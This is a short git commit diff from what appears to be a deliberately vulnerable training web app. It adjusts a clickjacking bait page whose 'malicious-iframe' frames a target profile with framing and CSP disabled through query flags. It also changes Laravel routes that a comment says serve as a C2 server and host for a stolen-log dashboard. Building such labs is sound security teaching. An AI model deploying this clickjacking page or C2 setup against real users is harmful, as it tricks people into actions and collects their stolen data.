Add
This commit is contained in:
parent
d934edfdb2
commit
ac6caeaf23
|
|
@ -64,9 +64,9 @@
|
|||
<button class="bait-button">Claim Prize Now!</button>
|
||||
|
||||
<iframe
|
||||
class="malicious-iframe"
|
||||
src="https://webapp.kr-rezvan.ir/profile?allow_framing=true"
|
||||
scrolling="no"
|
||||
class="malicious-iframe"
|
||||
src="http://webapp.kr-rezvan.ir/profile?allow_framing=true&disable_csp=true"
|
||||
scrolling="no"
|
||||
></iframe>
|
||||
</div>
|
||||
|
||||
|
|
|
|||
|
|
@ -1,5 +1,6 @@
|
|||
<?php
|
||||
|
||||
use App\Http\Middleware\VulnerableHeadersMiddleware;
|
||||
use Illuminate\Support\Facades\Route;
|
||||
use App\Http\Controllers\UserController;
|
||||
use App\Http\Controllers\VulnerabilityController;
|
||||
|
|
@ -11,7 +12,8 @@
|
|||
|--------------------------------------------------------------------------
|
||||
| این بخش به عنوان سرور C2 (Command and Control) و میزبان پیلودها عمل میکند.
|
||||
*/
|
||||
Route::domain('hackerapp.eitebar.ir')->group(function () {
|
||||
Route::domain('hackerapp.eitebar.ir')->withoutMiddleware([VulnerableHeadersMiddleware::class])
|
||||
->group(function () {
|
||||
|
||||
// داشبورد اصلی هکر (لاگهای سرقت شده)
|
||||
Route::get('/', [VulnerabilityController::class, 'viewLogs'])->name('hacker.home');
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user